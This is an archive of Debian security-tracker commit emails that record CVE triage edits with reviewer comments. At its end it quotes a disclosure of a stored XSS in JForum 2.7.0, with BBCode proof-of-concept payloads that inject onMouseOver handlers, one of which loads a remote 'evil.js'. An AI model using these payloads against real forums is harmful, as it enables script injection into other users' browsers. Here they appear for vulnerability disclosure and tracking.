+   NOTE: https://curl.se/docs/CVE-2022-27774.html
+   TODO: check
 CVE-2022-27773
RESERVED
 CVE-2022-27772 (** UNSUPPORTED WHEN ASSIGNED ** spring-boot versions prior to 
version  ...)
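
Review bot: each of the three curl entries (CVE-2022-27776, CVE-2022-27775, CVE-2022-27774) gets a package line for curl and also "TODO: check". Once the entry is assigned to a source package, the generic TODO no longer says what is left to do; drop it, or replace it with the specific open question, since the NOTE link to the curl advisory is already recorded.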



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/9f681b8935afa0e97aee4ab25603bf053900bb1f



[Git][security-tracker-team/security-tracker][master] CVE-2021-25745, CVE-2021-25746

2022-04-22 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b6f53575 by Henri Salo at 2022-04-22T20:17:05+03:00
CVE-2021-25745, CVE-2021-25746

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -78927,8 +78927,12 @@ CVE-2021-25747
RESERVED
 CVE-2021-25746
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/04/22/6
 CVE-2021-25745
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/04/22/5
 CVE-2021-25744
RESERVED
 CVE-2021-25743 (kubectl does not neutralize escape, meta or control sequences 
containe ...)
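
Review bot: the lines added under CVE-2021-25746 and CVE-2021-25745 give only "TODO: check" and an oss-security link, and both entries are RESERVED with no description, so the list does not say which software is affected. Add a short bracketed description after each CVE id so the next person can triage without opening the link.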



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b6f53575096973b46b62822b18e8d076b537f1e2



[Git][security-tracker-team/security-tracker][master] Remove empty newline

2022-04-15 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
88db86d5 by Henri Salo at 2022-04-15T13:16:58+03:00
Remove empty newline

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -487,7 +487,6 @@ CVE-2022-1328 (Buffer Overflow in uudecoder in Mutt 
affecting all versions start
- mutt 
NOTE: https://gitlab.com/muttmua/mutt/-/issues/404
NOTE: 
https://gitlab.com/muttmua/mutt/-/commit/e5ed080c00e59701ca62ef9b2a6d2612ebf765a5
-
 CVE-2022-1327
RESERVED
 CVE-2022-1326



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/88db86d508e45608a362e9fa884fff39d91e033d



[Git][security-tracker-team/security-tracker][master] NFU

2022-04-07 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7cf7ed91 by Henri Salo at 2022-04-07T22:12:05+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3844,8 +3844,10 @@ CVE-2022-27222
RESERVED
 CVE-2022-0993
RESERVED
+   NOT-FOR-US: WordPress plugin
 CVE-2022-0992
RESERVED
+   NOT-FOR-US: WordPress plugin
 CVE-2022-0991 (Insufficient Session Expiration in GitHub repository 
admidio/admidio p ...)
NOT-FOR-US: admidio
 CVE-2022-0990 (Server-Side Request Forgery (SSRF) in GitHub repository 
janeczku/calib ...)
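
Review bot: CVE-2022-0993 and CVE-2022-0992 are still RESERVED with no description, and the added tag says only "WordPress plugin". Name the plugin in the NOT-FOR-US line or add a NOTE with the source of the information, so the classification can be verified from the list itself.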



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7cf7ed9135f222d59f38cfb311009b4c7419fd0d



[Git][security-tracker-team/security-tracker][master] CVE-2022-24986: KCron: Insecure temporary file handling

2022-02-25 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b3df1883 by Henri Salo at 2022-02-25T14:11:49+02:00
CVE-2022-24986: KCron: Insecure temporary file handling

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2818,6 +2818,8 @@ CVE-2022-24987
RESERVED
 CVE-2022-24986
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/02/25/3
 CVE-2022-24985 (Forms generated by JQueryForm.com before 2022-02-05 allows a 
remote au ...)
NOT-FOR-US: JQueryForm.com
 CVE-2022-24984 (Forms generated by JQueryForm.com before 2022-02-05 (if 
file-upload ca ...)
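
Review bot: the commit message identifies CVE-2022-24986 as KCron insecure temporary file handling, but the entry itself records none of that, only "TODO: check" and the oss-security link. Put the description in brackets after the CVE id, and since the affected software is already known, let the TODO say what remains to be checked.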



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b3df1883f6c572ec19526c84e3b11bc5a4912f8d



[Git][security-tracker-team/security-tracker][master] CVE-2022-24948

2022-02-25 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
0778ac16 by Henri Salo at 2022-02-25T14:02:11+02:00
CVE-2022-24948

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2995,6 +2995,7 @@ CVE-2022-24949
RESERVED
 CVE-2022-24948
RESERVED
+   - jspwiki 
 CVE-2022-24947
RESERVED
- jspwiki 



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0778ac162f6403f75c7f31ef94b87626e41c72d5



[Git][security-tracker-team/security-tracker][master] CVE-2022-24947

2022-02-25 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
bd747801 by Henri Salo at 2022-02-25T13:59:39+02:00
CVE-2022-24947

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2997,6 +2997,7 @@ CVE-2022-24948
RESERVED
 CVE-2022-24947
RESERVED
+   - jspwiki 
 CVE-2022-24946
RESERVED
 CVE-2022-24945



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/bd747801e11bd4a0aee32412d5674af6d76a3571



[Git][security-tracker-team/security-tracker][master] airflow

2022-02-24 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a81b8b6c by Henri Salo at 2022-02-24T21:05:46+02:00
airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4049,6 +4049,7 @@ CVE-2022-24289 (Hessian serialization is a network 
protocol that supports object
NOT-FOR-US: Apache Cayenne
 CVE-2022-24288
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-24287
RESERVED
 CVE-2022-21799 (Cross-site scripting vulnerability in ELECOM LAN router 
WRC-300FEBK-R  ...)
@@ -14418,6 +14419,7 @@ CVE-2021-45230 (In Apache Airflow prior to 2.2.0. This 
CVE applies to a specific
- airflow  (bug #819700)
 CVE-2021-45229
RESERVED
+   - airflow  (bug #819700)
 CVE-2021-45228
RESERVED
 CVE-2021-45227



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a81b8b6cbb1325beff99dd2ef294e662b0a59f9d



[Git][security-tracker-team/security-tracker][master] NFU

2022-02-07 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
dbb7190c by Henri Salo at 2022-02-07T10:42:19+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5075,6 +5075,7 @@ CVE-2022-22932 (Apache Karaf obr:* commands and run goal 
on the karaf-maven-plug
- apache-karaf  (bug #881297)
 CVE-2022-22931
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-22930 (A remote code execution (RCE) vulnerability in the Template 
Management ...)
NOT-FOR-US: MCMS
 CVE-2022-22929 (MCMS v5.2.4 was discovered to have an arbitrary file upload 
vulnerabil ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/dbb7190c08ffe44065a6b1fb3a50be28132e584e



[Git][security-tracker-team/security-tracker][master] NFU

2022-02-05 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
96cd9e0c by Henri Salo at 2022-02-05T13:03:47+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4335,6 +4335,7 @@ CVE-2021-23150
RESERVED
 CVE-2022-23206
RESERVED
+   NOT-FOR-US: Apache Traffic Control
 CVE-2022-23205
RESERVED
 CVE-2022-23204



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/96cd9e0cfaaebd052779e800decaabbea9cd1e25



[Git][security-tracker-team/security-tracker][master] NFU

2022-02-04 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8e6aaef1 by Henri Salo at 2022-02-04T11:04:40+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -37033,8 +37033,10 @@ CVE-2021-36153 (Mismanaged state in 
GRPCWebToHTTP2ServerCodec.swift in gRPC Swif
NOT-FOR-US: gRPC Swift
 CVE-2021-36152
RESERVED
+   NOT-FOR-US: Apache Gobblin
 CVE-2021-36151
RESERVED
+   NOT-FOR-US: Apache Gobblin
 CVE-2021-3636 (It was found in OpenShift, before version 4.8, that the 
generated cert ...)
NOT-FOR-US: OpenShift
 CVE-2021-3635 (A flaw was found in the Linux kernel netfilter implementation 
in versi ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e6aaef17151f2c5f744089a729528a7be6618e2



[Git][security-tracker-team/security-tracker][master] NFU

2022-02-01 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
46c238ac by Henri Salo at 2022-02-01T11:15:27+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -12377,6 +12377,7 @@ CVE-2021-44453 (mySCADA myPRO: Versions 8.20.0 and 
prior has a vulnerable debug
NOT-FOR-US: mySCADA myPRO
 CVE-2021-44451
RESERVED
+   NOT-FOR-US: Apache Superset
 CVE-2021-44450 (A vulnerability has been identified in JT Utilities (All 
versions  ...)
NOT-FOR-US: Siemens
 CVE-2021-9 (A vulnerability has been identified in JT Utilities (All 
versions  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/46c238ac902f84385165ba47a44ae46e24e2cee4



[Git][security-tracker-team/security-tracker][master] Typo fix

2022-01-14 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6fc90f41 by Henri Salo at 2022-01-15T02:47:15+02:00
Typo fix

- - - - -


1 changed file:

- data/dsa-needed.txt


Changes:

=
data/dsa-needed.txt
=
@@ -24,7 +24,7 @@ flatpak (seb)
 librecad
 --
 libreswan/stable (carnil)
-  Maintainer preapred updates
+  Maintainer prepared updates
 --
 linux (carnil)
   Wait until more issues have piled up, though try to regulary rebase for point
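
Review bot: the context line under "linux (carnil)", directly below the corrected line, still reads "regulary". As this commit is a typo fix in the same file, correct that word to "regularly" here as well.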



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6fc90f415e97a3489c5d0f934d78c0a0107abe79



[Git][security-tracker-team/security-tracker][master] NFU

2022-01-06 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b2df1b42 by Henri Salo at 2022-01-06T15:57:46+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3335,10 +3335,13 @@ CVE-2022-22054
RESERVED
 CVE-2021-45458
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45457
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45456
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-45455
RESERVED
 CVE-2021-45454
@@ -28722,6 +28725,7 @@ CVE-2020-36421 (An issue was discovered in Arm Mbed TLS 
before 2.23.0. Because o
NOTE: https://github.com/ARMmbed/mbedtls/issues/3394
 CVE-2021-36774
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-36773 (uBlock Origin before 1.36.2 and nMatrix before 4.4.9 support 
an arbitr ...)
- ublock-origin 1.37.0+dfsg-1 (bug #991386)
[bullseye] - ublock-origin 1.37.0+dfsg-1~deb11u1
@@ -41664,6 +41668,7 @@ CVE-2021-31524
RESERVED
 CVE-2021-31522
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-3510 (Zephyr JSON decoder incorrectly decodes array of array. Zephyr 
version ...)
NOT-FOR-US: Zephyr, different from src:zephyr
 CVE-2021-3509 (A flaw was found in Red Hat Ceph Storage 4, in the Dashboard 
component ...)
@@ -51378,6 +51383,7 @@ CVE-2019-10102 (JetBrains Ktor framework (created using 
the Kotlin IDE template)
NOT-FOR-US: JetBrains Ktor
 CVE-2021-27738
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2021-27737 (Apache Traffic Server 9.0.0 is vulnerable to a remote DOS 
attack on th ...)
- trafficserver  (Only affects 9.x)
 CVE-2020-35358 (DomainMOD domainmod-v4.15.0 is affected by an insufficient 
session exp ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b2df1b4218cbed97dd84e9008d3c994ee260d411



[Git][security-tracker-team/security-tracker][master] 2 commits: NFU

2022-01-04 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
dd79b441 by Henri Salo at 2022-01-04T14:53:37+02:00
NFU

- - - - -
06412638 by Henri Salo at 2022-01-04T14:55:16+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -18914,6 +18914,7 @@ CVE-2021-40526 (Incorrect calculation of buffer size 
vulnerability in Peleton TT
NOT-FOR-US: Peleton
 CVE-2021-40525
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-3776 (showdoc is vulnerable to Cross-Site Request Forgery (CSRF) ...)
NOT-FOR-US: showdoc
 CVE-2021-3775 (showdoc is vulnerable to Cross-Site Request Forgery (CSRF) ...)
@@ -19994,8 +19995,10 @@ CVE-2021-40112 (Multiple vulnerabilities in the 
web-based management interface o
NOT-FOR-US: Cisco
 CVE-2021-40111
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-40110
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2021-40109 (A SSRF issue was discovered in Concrete CMS through 8.5.5. 
Users can a ...)
NOT-FOR-US: Concrete CMS
 CVE-2021-40108 (An issue was discovered in Concrete CMS through 8.5.5. The 
Calendar is ...)
@@ -23711,6 +23714,7 @@ CVE-2021-38543 (TP-Link UE330 USB splitter devices 
through 2021-08-09, in certai
NOT-FOR-US: TP-Link
 CVE-2021-38542
RESERVED
+   NOT-FOR-US Apache James
 CVE-2021-38541
RESERVED
 CVE-2021-3699
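
Review bot: the line added under CVE-2021-38542 reads "NOT-FOR-US Apache James", without the colon after the tag that every other NOT-FOR-US line added in this commit has. Change it to "NOT-FOR-US: Apache James" so it matches the tag format of the rest of the file.
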
@@ -32758,6 +32762,7 @@ CVE-2021-3604 (Secure 8 (Evalos) does not validate user 
input data correctly, al
NOT-FOR-US: Secure 8 (Evalos)
 CVE-2021-34797
RESERVED
+   NOT-FOR-US: Apache Geode
 CVE-2021-34796
RESERVED
 CVE-2021-34795 (Multiple vulnerabilities in the web-based management interface 
of the  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/compare/b074589480797821bc1933c2bc6d3a77e6664aaf...06412638e77ddd1dc0eb5a8c11dd8ebe8536b140



[Git][security-tracker-team/security-tracker][master] NFU

2021-12-21 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6cb91b0f by Henri Salo at 2021-12-21T10:55:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,10 +20,13 @@ CVE-2021-4143
RESERVED
 CVE-2017-20010
RESERVED
+   NOT-FOR-US: MODX Revolution
 CVE-2017-20009
RESERVED
+   NOT-FOR-US: MODX Revolution
 CVE-2012-20001
RESERVED
+   NOT-FOR-US: PrestaShop
 CVE-2021-45442
RESERVED
 CVE-2021-45441



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6cb91b0fb8002538d3faf91461a4270074665c71



[Git][security-tracker-team/security-tracker][master] NFU

2021-12-16 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
550a04b2 by Henri Salo at 2021-12-17T08:46:37+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2943,6 +2943,7 @@ CVE-2021-44146
RESERVED
 CVE-2021-44145
RESERVED
+   NOT-FOR-US: Apache NiFi
 CVE-2021-44144 (Croatia Control Asterix 2.8.1 has a heap-based buffer 
over-read, with  ...)
NOT-FOR-US: Croatia Control Asterix
 CVE-2021-4004



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/550a04b2c5d97de89cebb02973132baecfd5497d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/550a04b2c5d97de89cebb02973132baecfd5497d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits


[Git][security-tracker-team/security-tracker][master] NFU

2021-12-06 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
53e80a2d by Henri Salo at 2021-12-06T21:21:27+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4166,6 +4166,7 @@ CVE-2021-43411 (An issue was discovered in GNU Hurd 
before 0.9 20210404-9. When
- hurd 1:0.9.git20210404-9
 CVE-2021-43410
RESERVED
+   NOT-FOR-US: Apache Airavata
 CVE-2021-3932 (twill is vulnerable to Cross-Site Request Forgery (CSRF) ...)
NOT-FOR-US: twill
 CVE-2021-43409 (The WPO365 | LOGIN WordPress plugin (up to and 
including ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/53e80a2dbb483d93dfbe6b4b548a371c98047139



[Git][security-tracker-team/security-tracker][master] NFU

2021-11-29 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
3a9b32be by Henri Salo at 2021-11-29T20:58:42+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -65233,10 +65233,14 @@ CVE-2020-35076
REJECTED
 CVE-2020-35061
RESERVED
+CVE-2020-35037
+   NOT-FOR-US: WordPress plugin events-manager
 CVE-2020-35030
RESERVED
 CVE-2020-35017
RESERVED
+CVE-2020-35012
+   NOT-FOR-US: WordPress plugin events-manager
 CVE-2020-35001
RESERVED
 CVE-2016-15001
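
Review bot: CVE-2020-35037 and CVE-2020-35012 are inserted as new entries carrying a NOT-FOR-US line only, while every neighbouring entry in the hunk has a state line such as RESERVED or REJECTED. Add a bracketed description or a NOTE with the reference these ids were taken from, so it is clear where the assignment to the events-manager plugin comes from.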



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3a9b32bef3bdd79045de2442bfaf2db78487746b

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3a9b32bef3bdd79045de2442bfaf2db78487746b
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits


[Git][security-tracker-team/security-tracker][master] CVE-2021-36749 TODO

2021-09-23 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d2c4dd95 by Henri Salo at 2021-09-24T07:44:39+03:00
CVE-2021-36749 TODO

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -11140,6 +11140,8 @@ CVE-2021-36750
RESERVED
 CVE-2021-36749
RESERVED
+   NOTE: https://www.openwall.com/lists/oss-security/2021/09/24/1
+   TODO: check
 CVE-2021-3650
RESERVED
 CVE-2021-3649 (chatwoot is vulnerable to Inefficient Regular Expression 
Complexity ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d2c4dd95cad217184e5f4d5999c631c0c582062e



[Git][security-tracker-team/security-tracker][master] Typo fix

2021-09-23 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
33222c7d by Henri Salo at 2021-09-24T07:43:30+03:00
Typo fix

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -46939,37 +46939,37 @@ CVE-2021-22022 (The vRealize Operations Manager API 
(8.x prior to 8.5) contains
 CVE-2021-22021 (VMware vRealize Log Insight (8.x prior to 8.4) contains a 
Cross Site S ...)
NOT-FOR-US: VMware
 CVE-2021-22020 (The vCenter Server contains a denial-of-service vulnerability 
in the A ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22019 (The vCenter Server contains a denial-of-service vulnerability 
in VAPI  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22018 (The vCenter Server contains an arbitrary file deletion 
vulnerability i ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22017 (Rhttproxy as used in vCenter Server contains a vulnerability 
due to im ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22016 (The vCenter Server contains a reflected cross-site scripting 
vulnerabi ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22015 (The vCenter Server contains multiple local privilege 
escalation vulner ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22014 (The vCenter Server contains an authenticated code execution 
vulnerabil ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22013 (The vCenter Server contains a file path traversal 
vulnerability leadin ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22012 (The vCenter Server contains an information disclosure 
vulnerability du ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22011 (vCenter Server contains an unauthenticated API endpoint 
vulnerability  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22010 (The vCenter Server contains a denial-of-service vulnerability 
in VPXD  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22009 (The vCenter Server contains multiple denial-of-service 
vulnerabilities ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22008 (The vCenter Server contains an information disclosure 
vulnerability in ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22007 (The vCenter Server contains a local information disclosure 
vulnerabili ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22006 (The vCenter Server contains a reverse proxy bypass 
vulnerability due t ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22005 (The vCenter Server contains an arbitrary file upload 
vulnerability in  ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-22004 (An issue was discovered in SaltStack Salt before 3003.3. The 
salt mini ...)
- salt  (bug #994016)
NOTE: 
https://saltproject.io/security_announcements/salt-security-advisory-2021-sep-02/
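Review bot: Nothing stops the `VMWare` spelling corrected on these NOT-FOR-US lines from being reintroduced, since the product name is free text. A lint check that flags NOT-FOR-US names differing only in letter case would catch the variant at commit time rather than in a later clean-up.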
@@ -46995,7 +46995,7 @@ CVE-2021-21995 (OpenSLP as used in ESXi has a 
denial-of-service vulnerability du
 CVE-2021-21994 (SFCB (Small Footprint CIM Broker) as used in ESXi has an 
authenticatio ...)
NOT-FOR-US: VMware
 CVE-2021-21993 (The vCenter Server contains an SSRF (Server Side Request 
Forgery) vuln ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2021-21992 (The vCenter Server contains a denial-of-service vulnerability 
due to i ...)
NOT-FOR-US: VMware
 CVE-2021-21991 (The vCenter Server contains a local privilege escalation 
vulnerability ...)
@@ -312285,8 +312285,8 @@ CVE-2016- [mediawiki issues from 1.26.3, 1.25.6 
and 1.23.14]
 CVE-2016-4952 (QEMU (aka Quick Emulator), when built with VMWARE PVSCSI 
paravirtual S ...)
{DLA-1599-1}
- qemu 1:2.6+dfsg-2 (bug #825210)
-   [wheezy] - qemu  (VMWare PVSCSI paravirtual device 
implementation introduced later)
-   - qemu-kvm  (VMWare PVSCSI paravirtual device 
implementation introduced later)
+   [wheezy] - qemu  (VMware PVSCSI paravirtual device 
implementation introduced later)
+   - qemu-kvm  (VMware PVSCSI paravirtual device 
implementation introduced later)
NOTE: 
https://lists.gnu.org/archive/html/qemu-devel/2016-05/msg03774.html
NOTE: Introduced in: 
http://git.qemu.org/?p=qemu.git;a=commit;h=881d588a98bf0dce98ddb65c15aa0854c0ac41ed
 (v1.5.0-rc0)
 CVE-2016-4951 (The tipc_nl_publ_dump function in net/tipc/socket.c in the 
Linux kerne ...)
@@ -375313,15 +375313,15 @@ CVE-2014-1213 (Sophos Anti-Virus engine (SAVi) 
before 3.50.1, as used in VDL 4.9
 CVE-2014-1212
RESERVED
 CVE-2014-1211 (Cross-site request forgery (CSRF) vulnerability in VMware 
vCloud Direc ...)
-   NOT-FOR-US: VMWare
+   NOT-FOR-US: VMware
 CVE-2014-1210 (VMware vSphere Client 5.0 before Update 3 and 5.1 before Update 
2

[Git][security-tracker-team/security-tracker][master] CVE-2021-41303/shiro

2021-09-17 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6068907e by Henri Salo at 2021-09-17T09:15:56+03:00
CVE-2021-41303/shiro

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8,8 +8,11 @@ CVE-2021-3806
RESERVED
 CVE-2021-3805
RESERVED
-CVE-2021-41303
+CVE-2021-41303 [before 1.8.0 with Spring Boot a specially crafted HTTP request 
may cause an authentication bypass]
RESERVED
+   - shiro 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/09/17/1
+   TODO: check
 CVE-2021-41302
RESERVED
 CVE-2021-41301
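Review bot: The bracketed description added to CVE-2021-41303 gives `before 1.8.0` as the boundary, but the new `- shiro` line records no version, so the version information lives only in free text. When the `TODO: check` is resolved, move 1.8.0 onto the package line so tooling can compare it against the archive.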



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6068907eff5d15a61799f0485d0370056bbff064



[Git][security-tracker-team/security-tracker][master] NFU

2021-09-11 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
353fae8c by Henri Salo at 2021-09-11T10:49:13+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1640,6 +1640,7 @@ CVE-2021-40147 (EmTec ZOC before 8.02.2 allows \e[201~ 
pastes, a different vulne
NOT-FOR-US: EmTec ZOC
 CVE-2021-40146
RESERVED
+   NOT-FOR-US: Apache Any23
 CVE-2021-3738
RESERVED
 CVE-2021-3737 [client can enter an infinite loop on a 100 Continue response 
from the server]
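Review bot: CVE-2021-40146 is still `RESERVED` with no description on the visible lines, and the added `NOT-FOR-US: Apache Any23` carries no NOTE saying where the product attribution comes from. A `NOTE:` with the advisory or mailing-list URL would make the decision checkable; the same applies to CVE-2021-38555 in the next hunk.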
@@ -5211,6 +5212,7 @@ CVE-2021-38556 (includes/configure_client.php in RaspAP 
2.6.6 allows attackers t
NOT-FOR-US: RaspAP
 CVE-2021-38555
RESERVED
+   NOT-FOR-US: Apache Any23
 CVE-2021-38554 (HashiCorp Vault and Vault Enterprises UI erroneously 
cached and ...)
NOT-FOR-US: HashiCorp Vault
 CVE-2021-38553 (HashiCorp Vault and Vault Enterprise 1.4.0 through 1.7.3 
initialized a ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/353fae8cb7fa0cb555efe2594bc17201201b4233



Re: [FD] a xss vulnerability in Jforum 2.7.0

2021-09-07 Thread Henri Salo

On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
>  hi,
> 
>I found a vulnerability in the jforum 2.7.0. It is a storage cross site
> script vulnerability. The place is the user's profile - signature. The
> technique of the vulnerability is the same as that described in this
> article "STORED CROSS SITE SCRIPTING IN BBCODE" (
> https://mindedsecurity.com/advisories/msa130510/), and the POC is:
> 
> color tag:
> [color=red" onMouseOver="alert('xss')]XSS[/color]
> [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js')
> ;"]XSS[/color]
> Renders into HTML:
> XSS
> http://192.168.45.148:8080/evil.js');"
> color="red">XSS
> 
> img tag:
> [img]/demo.jpg" onMouseOver="alert('xss')[/img]
> Renders into HTML:
> 
> 
> url= tag:
> [url='http://www.demo.com; onMouseOver="alert('xss')']test[/url]
